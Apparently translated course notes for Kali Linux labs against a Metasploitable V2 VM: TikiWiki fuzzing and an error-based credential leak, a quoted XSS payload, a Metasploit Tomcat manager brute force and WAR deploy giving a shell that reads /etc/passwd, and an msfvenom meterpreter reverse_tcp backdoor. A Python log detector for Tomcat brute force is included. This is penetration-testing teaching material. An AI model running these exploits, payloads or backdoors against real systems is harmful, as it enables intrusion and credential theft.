● powerfuzzer is a multithreaded Java application that finds attack factors by brute-force detecting hidden files or directories on a web application.
(Working in Kali Linux)
● Set up Tikiwiki on the Metasploitable V2 server from Kali Linux through a web browser
# firefox http://192.168.10.134/tikiwiki/tiki-index.php
-> Select 'Go here to begin the installation process'
-> On the next page
Database Type : MySQL
Host : localhost
User : root
Password :
Database name : tikiwiki195
-> On the next page
-> Create
-> Close the web browser
[Reference] To check the database name on the Metasploitable V2 server:
(Metasploitable V2 Server)
$ mysql -u root -p /* -u : username, -p : password */
Enter password: <ENTER>
mysql> show databases;
mysql> quit
$
③ Run powerfuzzer in Kali Linux
KaliLinux > Web Applications > Web Application Fuzzy > powerfuzzer
or
KaliLinux > Vulnerability Analysis > Fuzzing Tools > powerfuzzer
At the bottom of the tool:
Target URL : http://192.168.10.134
Scan
-> Analyzing the output produces a long list.
-> Pick one of the URLs and try accessing it in the browser
# firefox http://192.168.10.134/tikiwiki/tiki-index.php
-> The 'Home Page' is displayed.
-> If the home page is not displayed, the Tikiwiki site has not been initialized. In that case,
connect to http://192.168.10.134/tikiwiki/tiki-index.php and run the setup again.
③ Attacking the tikiwiki web service
Search http://www.exploit-db.com to check the latest vulnerabilities.
On the http://www.exploit-db.com site:
-> Select 'search' at the top right
-> Enter 'tikiwiki' in the Description field.
-> You can see that there are quite a lot of bugs.
-> Review the results from 2004 to 2010
Web page output
Date D A V Description Plat. Author
2008-01-20 Exploit Code Downloads Download Vulnerable Application Waiting verification TikiWiki < 1.9.9 tiki-listmovies.php Directory Traversal Vulnerability php Sha0
2010-09-20 Exploit Code Downloads - Verified TikiWiki tiki-graph_formula Remote PHP Code Execution php metasploit
2010-07-25 Exploit Code Downloads - Verified TikiWiki jhot Remote Command Execution php metasploit
2010-03-09 Exploit Code Downloads - Verified TikiWiki Versions Prior to 4.2 Multiple Vulnerabilities php Mateusz Drygas
2009-03-12 Exploit Code Downloads - Verified TikiWiki 2.2/3.0 'tiki-galleries.php' Cross Site Scripting Vulnerability php iliz
2009-03-12 Exploit Code Downloads - Verified TikiWiki 2.2/3.0 'tiki-list_file_gallery.php' Cross Site Scripting Vulnerability php iliz
2009-03-12 Exploit Code Downloads - Verified TikiWiki 2.2/3.0 'tiki-listpages.php' Cross Site Scripting Vulnerability php iliz
2007-10-25 Exploit Code Downloads - Verified TikiWiki <= 1.9.8.1 - Local File Inclusion Vulnerabilities php L4teral
2007-10-12 Exploit Code Downloads - Verified TikiWiki <= 1.9.8 tiki-graph_formula.php Command Execution Exploit php str0ke
2007-10-10 Exploit Code Downloads - Verified TikiWiki 1.9.8 - Remote PHP Injection Vulnerability php ShAnKaR
2006-11-01 Exploit Code Downloads - Verified TikiWiki 1.9.5 Sirius (sort_mode) Information Disclosure Vulnerability php securfrog
2006-09-02 Exploit Code Downloads - Verified TikiWiki <= 1.9 Sirius (jhot.php) Remote Command Execution Exploit php rgod
2006-05-29 Exploit Code Downloads - Verified TikiWiki 1.9 tiki-lastchanges.php Multiple Parameter XSS php Blwood
2005-11-09 Exploit Code Downloads - Verified TikiWiki 1.9 Tiki-view_forum_thread.PHP Cross-Site Scripting Vulnerability php Moritz Naumann
..... (omitted) .....
-> Look at the 2006-11-01 bug.
-> Select 'Sirius (sort_mode) Information Disclosure Vulnerability'.
/*==========================================*/
//tikiwiki version 1.9.5 (CVS) -Sirius- (PoC)
// Product: Tikiwiki
// URL: http://tikiwiki.org/
// RISK: critical
/*==========================================*/
there's a critical security bug in tikiwiki version 1.9.5 (CVS) -Sirius-
an anonymous user can dump the mysql user & passwd just by creating a mysql error with the "sort_mode" var, with the following links:
/tiki-listpages.php?offset=0&sort_mode=
/tiki-lastchanges.php?days=1&offset=0&sort_mode=
/messu-archive.php?sort_mode=
/messu-mailbox.php?sort_mode=
/messu-sent.php?sort_mode=
/tiki-directory_add_site.php?sort_mode=
/tiki-directory_ranking.php?sort_mode=
/tiki-directory_search.php?sort_mode=
/tiki-forums.php?sort_mode=
/tiki-view_forum.php?forumId=
/tiki-friends.php?sort_mode=
/tiki-list_blogs.php?sort_mode=
/tiki-list_faqs.php?sort_mode=
/tiki-list_trackers.php?sort_mode=
/tiki-list_users.php?sort_mode=
/tiki-my_tiki.php?sort_mode=
/tiki-notepad_list.php?sort_mode=
/tiki-orphan_pages.php?sort_mode=
/tiki-shoutbox.php?sort_mode=
/tiki-usermenu.php?sort_mode=
/tiki-webmail_contacts.php?sort_mode=
a proof of concept is available here : http://cockor.free.fr/PoC.swf
there's also an xss here :
/tiki-featured_link.php?type=f&url="
></iframe><scr</script>ipt>alert('XSS')</scri</script>pt> <!--
regards , securfrog
# milw0rm.com [2006-11-01]
# firefox &
-> http://192.168.10.134/tikiwiki/tiki-listpages.php?offset=0&sort_mode=
-> Refer to the error message section at the bottom of the page.
array(3) {
[0]=>
array(7) {
["file"]=>
string(35) "/var/www/tikiwiki/lib/tikidblib.php"
["line"]=>
int(84)
["function"]=>
string(9) "sql_error"
["class"]=>
string(6) "TikiDB"
["object"]=>
object(TikiLib)#6 (10) {
["db"]=>
object(ADODB_mysql)#2 (78) {
["databaseType"]=>
string(5) "mysql"
["dataProvider"]=>
string(5) "mysql"
["hasInsertID"]=>
bool(true)
["hasAffectedRows"]=>
bool(true)
["metaTablesSQL"]=>
string(11) "SHOW TABLES"
["metaColumnsSQL"]=>
string(20) "SHOW COLUMNS FROM %s"
["fmtTimeStamp"]=>
..... (omitted) .....
["hasTransactions"]=>
bool(false)
["forceNewConnect"]=>
bool(false)
["poorAffectedRows"]=>
bool(true)
["clientFlags"]=>
int(0)
["substr"]=>
string(9) "substring"
["nameQuote"]=>
string(1) "`"
["_genIDSQL"]=>
string(38) "update %s set id=LAST_INSERT_ID(id+1);"
["_genSeqSQL"]=>
string(33) "create table %s (id int not null)"
["_genSeq2SQL"]=>
string(26) "insert into %s values (%s)"
["_dropSeqSQL"]=>
string(13) "drop table %s"
["database"]=>
string(11) "tikiwiki195"
["host"]=>
string(9) "localhost"
["user"]=>
string(4) "root"
["password"]=>
string(0) ""
["debug"]=>
bool(false)
["maxblobsize"]=>
int(262144)
["concat_operator"]=>
string(1) "+"
["length"]=>
string(6) "length"
["random"]=>
string(6) "rand()"
..... (omitted) .....
④ Let's access MySQL and check the information.
# ssh msfadmin@192.168.10.134
msfadmin@192.168.10.134's password: (msfadmin)
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
No mail.
Last login: Thu Jul 17 21:50:01 2014
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.
$ mysql -u root -p
Enter password: <ENTER> <---- there is no password.
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 21
Server version: 5.0.51a-3ubuntu5 (Ubuntu)
Type 'help;' or '\h' for help. Type '\c' to clear the buffer.
mysql> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| dvwa |
| metasploit |
| mysql |
| owasp10 |
| tikiwiki |
| tikiwiki195 |
+--------------------+
7 rows in set (0.00 sec)
mysql> use tikiwiki195
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> show tables;
+------------------------------------+
| Tables_in_tikiwiki195 |
+------------------------------------+
| galaxia_activities |
| galaxia_activity_roles |
| galaxia_instance_activities |
| galaxia_instance_comments |
| galaxia_instances |
..... (중략) .....
| tiki_userpoints |
| tiki_users |
| tiki_users_score |
| tiki_webmail_contacts |
| tiki_webmail_messages |
| tiki_wiki_attachments |
| tiki_zones |
| users_grouppermissions |
| users_groups |
| users_objectpermissions |
| users_permissions |
| users_usergroups |
| users_users |
+------------------------------------+
194 rows in set (0.00 sec)
mysql> select * from users_users;
+--------+-------+-------+----------+----------+---------------+-----------+--------------+------------------+-----------+----------+----------------------------------+---------+------------+------------+----------------+------------+---------------+------------+-------+
| userId | email | login | password | provpass | default_group | lastLogin | currentLogin | registrationDate | challenge | pass_due | hash | created | avatarName | avatarSize | avatarFileType | avatarData | avatarLibName | avatarType | score |
+--------+-------+-------+----------+----------+---------------+-----------+--------------+------------------+-----------+----------+----------------------------------+---------+------------+------------+----------------+------------+---------------+------------+-------+
| 1 | | admin | admin | NULL | NULL | NULL | NULL | NULL | NULL | NULL | f6fdffe48c908deb0f4c3bd36c032e72 | NULL | NULL | NULL | NULL | NULL | NULL | NULL | 0 |
+--------+-------+-------+----------+----------+---------------+-----------+--------------+------------------+-----------+----------+----------------------------------+---------+------------+------------+----------------+------------+---------------+------------+-------+
1 row in set (0.00 sec)
mysql> quit
-> Confirms the admin/admin credentials
$ exit
#
# firefox &
-> http://192.168.10.134/tikiwiki/tiki-index.php
-> A 'Backups' entry exists in the left menu.
-> At the bottom, under 'upload a backup', the 'Choose file' and 'upload' controls can be used to test for a file-upload vulnerability. (Test this part on your own.)
[Lab] Using Kali Linux 3
● Attack a Tomcat vulnerability using Metasploit.
● Use the tomcat_mgr_login scanner, which tries several weak default accounts against the Tomcat 5 manager page to find out which ones work.
(Kali Linux)
① Check the target system's ports/services/versions
# nmap -sV -p 1-65535 192.168.10.134 /* metasploitable V2 Linux ip : 192.168.10.134 */
Starting Nmap 6.46 ( http://nmap.org ) at 2014-07-17 21:06 KST
Nmap scan report for 192.168.10.134
Host is up (0.00024s latency).
Not shown: 65505 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
53/tcp open domain ISC BIND 9.4.2
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2)
111/tcp open rpcbind 2 (RPC #100000)
139/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
512/tcp open exec netkit-rsh rexecd
513/tcp open login?
514/tcp open tcpwrapped
1099/tcp open rmiregistry GNU Classpath grmiregistry
1524/tcp open shell Metasploitable root shell
2049/tcp open nfs 2-4 (RPC #100003)
2121/tcp open ftp ProFTPD 1.3.1
3306/tcp open mysql MySQL 5.0.51a-3ubuntu5
3632/tcp open distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7
5900/tcp open vnc VNC (protocol 3.3)
6000/tcp open X11 (access denied)
6667/tcp open irc Unreal ircd
6697/tcp open irc Unreal ircd
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1
8787/tcp open drb Ruby DRb RMI (Ruby 1.8; path /usr/lib/ruby/1.8/drb)
42043/tcp open mountd 1-3 (RPC #100005)
48481/tcp open unknown
50478/tcp open status 1 (RPC #100024)
56189/tcp open nlockmgr 1-4 (RPC #100021)
MAC Address: 00:0C:29:FA:DD:2A (VMware)
Service Info: Hosts: metasploitable.localdomain, localhost, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 165.23 seconds
-> This takes a little while
# man nmap
-sV: Probe open ports to determine service/version info
-p <port ranges>: Only scan specified ports
Ex: -p22; -p1-65535; -p U:53,111,137,T:21-25,80,139,8080,S:9
② Access the default home page (Tomcat)
# firefox http://192.168.10.134:8180/
-> Apache Tomcat/5.5 is installed (check the information at the top-left of the default page).
-> If only the default configuration is in place, the manager page is reachable.
# firefox http://192.168.10.134:8180/manager/html
-> A screen asking for the manager page's ID/password will appear.
-> Just confirm this and close the connection.
④ Perform a dictionary attack against the Tomcat manager page
# msfconsole
_ _
/ \ /\ __ _ __ /_/ __
| |\ / | _____ \ \ ___ _____ | | / \ _ \ \
| | \/| | | ___\ |- -| /\ / __\ | -__/ | || | || | |- -|
|_| | | | _|__ | |_ / -\ __\ \ | | | | \__/| | | |_
|/ |____/ \___\/ /\ \\___/ \/ \__| |_\ \___\
Payload caught by AV? Fly under the radar with Dynamic Payloads in
Metasploit Pro -- learn more on http://rapid7.com/metasploit
=[ metasploit v4.9.2-2014052101 [core:4.9 api:1.0] ]
+ -- --=[ 1311 exploits - 784 auxiliary - 221 post ]
+ -- --=[ 335 payloads - 35 encoders - 8 nops ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
msf > search tomcat
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
auxiliary/admin/http/tomcat_administration normal Tomcat Administration Tool Default Access
auxiliary/admin/http/tomcat_administration normal Tomcat Administration Tool Default Access
auxiliary/admin/http/tomcat_utf8_traversal normal Tomcat UTF-8 Directory Traversal Vulnerability
auxiliary/admin/http/tomcat_utf8_traversal normal Tomcat UTF-8 Directory Traversal Vulnerability
auxiliary/admin/http/trendmicro_dlp_traversal normal TrendMicro Data Loss Prevention 5.5 Directory Traversal
auxiliary/admin/http/trendmicro_dlp_traversal normal TrendMicro Data Loss Prevention 5.5 Directory Traversal
auxiliary/dos/http/apache_commons_fileupload_dos 2014-02-06 normal Apache Commons FileUpload and Apache Tomcat DoS
auxiliary/dos/http/apache_commons_fileupload_dos 2014-02-06 normal Apache Commons FileUpload and Apache Tomcat DoS
auxiliary/dos/http/apache_tomcat_transfer_encoding 2010-07-09 normal Apache Tomcat Transfer-Encoding Information Disclosure and DoS
auxiliary/dos/http/apache_tomcat_transfer_encoding 2010-07-09 normal Apache Tomcat Transfer-Encoding Information Disclosure and DoS
auxiliary/dos/http/hashcollision_dos 2011-12-28 normal Hashtable Collisions
auxiliary/dos/http/hashcollision_dos 2011-12-28 normal Hashtable Collisions
auxiliary/scanner/http/tomcat_enum normal Apache Tomcat User Enumeration
auxiliary/scanner/http/tomcat_enum normal Apache Tomcat User Enumeration
auxiliary/scanner/http/tomcat_mgr_login normal Tomcat Application Manager Login Utility
auxiliary/scanner/http/tomcat_mgr_login normal Tomcat Application Manager Login Utility
exploit/multi/http/struts_default_action_mapper 2013-07-02 excellent Apache Struts 2 DefaultActionMapper Prefixes OGNL Code Execution
exploit/multi/http/struts_dev_mode 2012-01-06 excellent Apache Struts 2 Developer Mode OGNL Execution
exploit/multi/http/tomcat_mgr_deploy 2009-11-09 excellent Apache Tomcat Manager Application Deployer Authenticated Code Execution
exploit/multi/http/tomcat_mgr_upload 2009-11-09 excellent Apache Tomcat Manager Authenticated Upload Code Execution
post/windows/gather/enum_tomcat normal Windows Gather Apache Tomcat Enumeration
post/windows/gather/enum_tomcat normal Windows Gather Apache Tomcat Enumeration
msf > use auxiliary/scanner/http/tomcat_mgr_login
msf auxiliary(tomcat_mgr_login) > show options
Module options (auxiliary/scanner/http/tomcat_mgr_login):
Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS false no Try blank passwords for all users
BRUTEFORCE_SPEED 5 to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
PASSWORD no A specific password to authenticate with
PASS_FILE /opt/metasploit/apps/pro/msf3/data/wordlists/tomcat_mgr_default_pass.txt no File containing passwords, one per line
Proxies no Use a proxy chain
RHOSTS yes The target address range or CIDR identifier
RPORT 8080 yes The target port
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 1 yes The number of concurrent threads
URI /manager/html yes URI for Manager login. Default is /manager/html
USERNAME no A specific username to authenticate as
USERPASS_FILE /opt/metasploit/apps/pro/msf3/data/wordlists/tomcat_mgr_default_userpass.txt no File containing users and passwords separated by space, one pair per line
USER_AS_PASS false no Try the username as the password for all users
USER_FILE /opt/metasploit/apps/pro/msf3/data/wordlists/tomcat_mgr_default_users.txt no File containing users, one per line
VERBOSE true yes Whether to print output for all attempts
VHOST no HTTP server virtual host
msf auxiliary(tomcat_mgr_login) > set rhosts 192.168.10.134
rhosts => 192.168.10.134
msf auxiliary(tomcat_mgr_login) > set rport 8180
rport => 8180
msf auxiliary(tomcat_mgr_login) > exploit
[*] 192.168.10.134:8180 TOMCAT_MGR - [01/55] - Trying username:'j2deployer' with password:'j2deployer'
[-] 192.168.10.134:8180 TOMCAT_MGR - [01/55] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'j2deployer'
[*] 192.168.10.134:8180 TOMCAT_MGR - [02/55] - Trying username:'ovwebusr' with password:'OvW*busr1'
[-] 192.168.10.134:8180 TOMCAT_MGR - [02/55] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'ovwebusr'
[*] 192.168.10.134:8180 TOMCAT_MGR - [03/55] - Trying username:'cxsdk' with password:'kdsxc'
[-] 192.168.10.134:8180 TOMCAT_MGR - [03/55] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'cxsdk'
..... (omitted) ....
[*] 192.168.10.134:8180 TOMCAT_MGR - [47/55] - Trying username:'tomcat' with password:'role1'
[-] 192.168.10.134:8180 TOMCAT_MGR - [47/55] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'tomcat'
[*] 192.168.10.134:8180 TOMCAT_MGR - [48/55] - Trying username:'tomcat' with password:'root'
[-] 192.168.10.134:8180 TOMCAT_MGR - [48/55] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'tomcat'
[*] 192.168.10.134:8180 TOMCAT_MGR - [49/55] - Trying username:'tomcat' with password:'tomcat'
[+] http://192.168.10.134:8180/manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] successful login 'tomcat' : 'tomcat'
[*] 192.168.10.134:8180 TOMCAT_MGR - [50/55] - Trying username:'both' with password:'admin'
[-] 192.168.10.134:8180 TOMCAT_MGR - [50/55] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'both'
[*] 192.168.10.134:8180 TOMCAT_MGR - [51/55] - Trying username:'both' with password:'manager'
[-] 192.168.10.134:8180 TOMCAT_MGR - [51/55] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'both'
[*] 192.168.10.134:8180 TOMCAT_MGR - [52/55] - Trying username:'both' with password:'role1'
[-] 192.168.10.134:8180 TOMCAT_MGR - [52/55] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'both'
[*] 192.168.10.134:8180 TOMCAT_MGR - [53/55] - Trying username:'both' with password:'root'
[-] 192.168.10.134:8180 TOMCAT_MGR - [53/55] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'both'
[*] 192.168.10.134:8180 TOMCAT_MGR - [54/55] - Trying username:'both' with password:'tomcat'
[-] 192.168.10.134:8180 TOMCAT_MGR - [54/55] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'both'
[*] 192.168.10.134:8180 TOMCAT_MGR - [55/55] - Trying username:'both' with password:'s3cret'
[-] 192.168.10.134:8180 TOMCAT_MGR - [55/55] - /manager/html [Apache-Coyote/1.1] [Tomcat Application Manager] failed to login as 'both'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
-> A line marked [+] means the login succeeded.
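The tomcat_mgr_login run above leaves a characteristic trace on the server side: a burst of HTTP 401 responses for /manager/html from one source address, followed by a 200 that carries an authenticated user name. The following added example (my own code, not from the page, Tomcat or Metasploit) shows how a defender can spot that pattern in a Tomcat access log. It assumes the AccessLogValve "common" pattern (%h %l %u %t "%r" %s %b); the log lines are constructed for this example, and the threshold and window are arbitrary values to tune per site.

```python
import re
from collections import Counter, defaultdict, deque
from datetime import datetime, timedelta

# Tomcat AccessLogValve "common" pattern: %h %l %u %t "%r" %s %b
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) (?P<bytes>\S+)$'
)
TIME_FMT = "%d/%b/%Y:%H:%M:%S %z"

# Constructed sample lines (not real log data): five guesses at /manager/html that
# fail with 401, one 200 carrying an authenticated user, and an unrelated request.
SAMPLE_LOG = """\
192.168.10.50 - - [17/Jul/2014:21:40:01 +0900] "GET /manager/html HTTP/1.1" 401 2473
192.168.10.50 - - [17/Jul/2014:21:40:01 +0900] "GET /manager/html HTTP/1.1" 401 2473
192.168.10.50 - - [17/Jul/2014:21:40:02 +0900] "GET /manager/html HTTP/1.1" 401 2473
192.168.10.50 - - [17/Jul/2014:21:40:02 +0900] "GET /manager/html HTTP/1.1" 401 2473
192.168.10.50 - - [17/Jul/2014:21:40:03 +0900] "GET /manager/html HTTP/1.1" 401 2473
192.168.10.50 - tomcat [17/Jul/2014:21:40:04 +0900] "GET /manager/html HTTP/1.1" 200 18754
192.168.10.77 - - [17/Jul/2014:21:41:00 +0900] "GET /tomcat-docs/ HTTP/1.1" 200 1234
"""


def parse_line(line):
    """Parse one access-log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["time"] = datetime.strptime(rec["time"], TIME_FMT)
    return rec


def detect_manager_bruteforce(lines, threshold=5, window=timedelta(minutes=1)):
    """Flag hosts with >= threshold failed manager-app logins inside a sliding window.

    Returns {host: {"first": ts, "last": ts, "failures": total_failed,
                    "success_user": user_or_None}}.
    """
    recent = defaultdict(deque)  # host -> failure timestamps inside the window
    total = Counter()            # host -> all failures seen for /manager
    alerts = {}
    for line in lines:
        rec = parse_line(line)
        if rec is None or not rec["path"].startswith("/manager"):
            continue
        host, ts = rec["host"], rec["time"]
        if rec["status"] in ("401", "403"):
            total[host] += 1
            q = recent[host]
            q.append(ts)
            while q and ts - q[0] > window:
                q.popleft()
            if len(q) >= threshold:
                alert = alerts.setdefault(host, {"first": q[0], "success_user": None})
                alert["last"] = ts
                alert["failures"] = total[host]
        elif rec["status"] == "200" and rec["user"] != "-" and host in alerts:
            # An authenticated 200 right after the burst: the guess probably worked.
            alerts[host]["success_user"] = rec["user"]
    return alerts


if __name__ == "__main__":
    for host, a in detect_manager_bruteforce(SAMPLE_LOG.splitlines()).items():
        print(f"{host}: {a['failures']} failed manager logins between "
              f"{a['first']:%H:%M:%S} and {a['last']:%H:%M:%S}; "
              f"success as {a['success_user']!r}")
```

The "success after burst" field is the one worth paging on: a lone string of 401s may be a misconfigured monitor, but a 401 burst that ends in an authenticated 200 means a credential was guessed. The same logic applies to any HTTP Basic-protected admin path; change the prefix test to match.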
⑤ Log in to the manager page
# firefox http://192.168.10.134:8180/manager/html
-> ID: tomcat
-> Password: tomcat
-> After logging in, note the WAR file upload function at the bottom of the page
--------------------------------------------------------------------------------
......
---------------------------------------------------------
WAR file to deploy
---------------------------------------------------------
Select WAR file to upload [Browser] No file selected.
[Deploy]
--------------------------------------------------------------------------------
-> A default Tomcat installation leaves a 'file upload vulnerability'.
-> Through this vulnerability, a WAR file containing malicious code can be used to penetrate the system.
⑥ Use Metasploit's automated malicious-code upload attack
# msfconsole
msf auxiliary(tomcat_mgr_login) > search tomcat
..... (omitted) .....
auxiliary/scanner/http/tomcat_mgr_login normal Tomcat Application Manager Login Utility
exploit/multi/http/struts_default_action_mapper 2013-07-02 excellent Apache Struts 2 DefaultActionMapper Prefixes OGNL Code Execution
exploit/multi/http/struts_dev_mode 2012-01-06 excellent Apache Struts 2 Developer Mode OGNL Execution
exploit/multi/http/tomcat_mgr_deploy 2009-11-09 excellent Apache Tomcat Manager Application Deployer Authenticated Code Execution
exploit/multi/http/tomcat_mgr_upload 2009-11-09 excellent Apache Tomcat Manager Authenticated Upload Code Execution
post/windows/gather/enum_tomcat normal Windows Gather Apache Tomcat Enumeration
msf auxiliary(tomcat_mgr_login) > use exploit/multi/http/tomcat_mgr_deploy
msf exploit(tomcat_mgr_deploy) > show options
Module options (exploit/multi/http/tomcat_mgr_deploy):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD no The password for the specified username
PATH /manager yes The URI path of the manager app (/deploy and
/undeploy will be used)
Proxies no Use a proxy chain
RHOST yes The target address
RPORT 80 yes The target port
USERNAME no The username to authenticate as
VHOST no HTTP server virtual host
Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(tomcat_mgr_deploy) > set password tomcat
password => tomcat
msf exploit(tomcat_mgr_deploy) > set rhost 192.168.10.134
rhost => 192.168.10.134
msf exploit(tomcat_mgr_deploy) > set rport 8180
rport => 8180
msf exploit(tomcat_mgr_deploy) > set username tomcat
username => tomcat
msf exploit(tomcat_mgr_deploy) > show payloads
Compatible Payloads
===================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
generic/custom normal Custom Payload
generic/shell_bind_tcp normal Generic Command Shell, Bind TCP Inline
generic/shell_reverse_tcp normal Generic Command Shell, Reverse TCP Inline
java/meterpreter/bind_tcp normal Java Meterpreter, Java Bind TCP Stager
java/meterpreter/reverse_http normal Java Meterpreter, Java Reverse HTTP Stager
java/meterpreter/reverse_https normal Java Meterpreter, Java Reverse HTTPS Stager
java/meterpreter/reverse_tcp normal Java Meterpreter, Java Reverse TCP Stager
java/shell/bind_tcp normal Command Shell, Java Bind TCP Stager
java/shell/reverse_tcp normal Command Shell, Java Reverse TCP Stager
java/shell_reverse_tcp normal Java Command Shell, Reverse TCP Inline
msf exploit(tomcat_mgr_deploy) > set payload java/shell/bind_tcp
payload => java/shell/bind_tcp
msf exploit(tomcat_mgr_deploy) > show options
Module options (exploit/multi/http/tomcat_mgr_deploy):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD tomcat no The password for the specified username
PATH /manager yes The URI path of the manager app (/deploy and
/undeploy will be used)
Proxies no Use a proxy chain
RHOST 192.168.10.134 yes The target address
RPORT 8180 yes The target port
USERNAME tomcat no The username to authenticate as
VHOST no HTTP server virtual host
Payload options (java/shell/bind_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LPORT 4444 yes The listen port
RHOST 192.168.10.134 no The target address
Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(tomcat_mgr_deploy) > exploit
[*] Started bind handler
[*] Attempting to automatically select a target...
[*] Automatically selected target "Linux x86"
[*] Uploading 6456 bytes as TZbEqMlwvWhjXx2vZyMI2tdANFMx.war ...
[*] Executing /TZbEqMlwvWhjXx2vZyMI2tdANFMx/FDDKrkqE4OadJgJF4h6N.jsp...
[*] Undeploying TZbEqMlwvWhjXx2vZyMI2tdANFMx ...
[*] Sending stage (2976 bytes) to 192.168.10.134
[*] Command shell session 1 opened (192.168.10.50:33731 -> 192.168.10.134:4444) at
2014-07-18 14:09:52 +0900
dir
bin dev initrd lost+found nohup.out root sys var
boot etc initrd.img media opt sbin tmp vmlinuz
cdrom home lib mnt proc srv usr
cat /etc/passwd
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
..... (omitted) .....
exit
[*] 192.168.10.134 - Command shell session 1 closed. Reason: Died from EOFError
<ENTER>
msf exploit(tomcat_mgr_deploy) > quit
-> Therefore, anyone operating a system on an open-source WAS (web application server) must keep up with the vulnerabilities that are regularly published for it.
-> Try running various commands.
[Lab] Select a target system.
[Lab] Gather information.
[Lab] Check whether vulnerabilities exist.
[Lab] See whether there is room for an attack and, if necessary, attack.
[Lab] If the attack succeeds, document it.
[Lab] Using Kali Linux 4
Meterpreter
● A feature that, after the target system has been penetrated by exploiting a vulnerability through Ruby-based scripts, lets you obtain system information with simple commands.
● Because it uses the libraries supported by Metasploit, as long as you have an idea of how to obtain the information, you can develop useful functionality.
● (Prerequisite) Since Meterpreter runs on the assumption that the target server has already been penetrated, some method of getting in (e.g. the Tomcat vulnerability) must be carried out first.
Setting up a system-penetration environment with a resource file
● Set up the environment by penetrating through a vulnerability
● Set up the environment by penetrating through a vulnerability and then planting a backdoor (malware)
In class, the test environment for system penetration is built using a backdoor.
■ Lab systems
- KaliLinux
- Windows 7
① Create the backdoor
(Kali Linux)
# ifconfig | grep inet
inet addr:192.168.10.50 Bcast:192.168.10.255 Mask:255.255.255.0
inet6 addr: fe80::20c:29ff:fe13:974a/64 Scope:Link
inet addr:192.168.20.50 Bcast:192.168.20.255 Mask:255.255.255.0
inet6 addr: fe80::20c:29ff:fe13:9754/64 Scope:Link
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
# mkdir -p /root/bin
# cd /root/bin
# vi reverse_resource.rc
use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.20.50
set ExitSession false
exploit -j -z
-> Enter your own IP address for LHOST.
② Automatically generate the attack code using a payload
[Reference] msfvenom command usage
# msfvenom
-v, --var-name <name> Specify a custom variable name to use for certain output formats
-p, --payload <payload> Payload to use. Specify a '-' or stdin to use custom payloads
-f, --format <format> Output format (use --help-formats for a list)
--help-formats List available formats
-o, --out <path> Save the payload
# msfvenom -p windows/x64/meterpreter/reverse_tcp \
LHOST=192.168.20.50 LPORT=4444 \
-f exe \
-o reverse_test.exe
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86_64 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 510 bytes
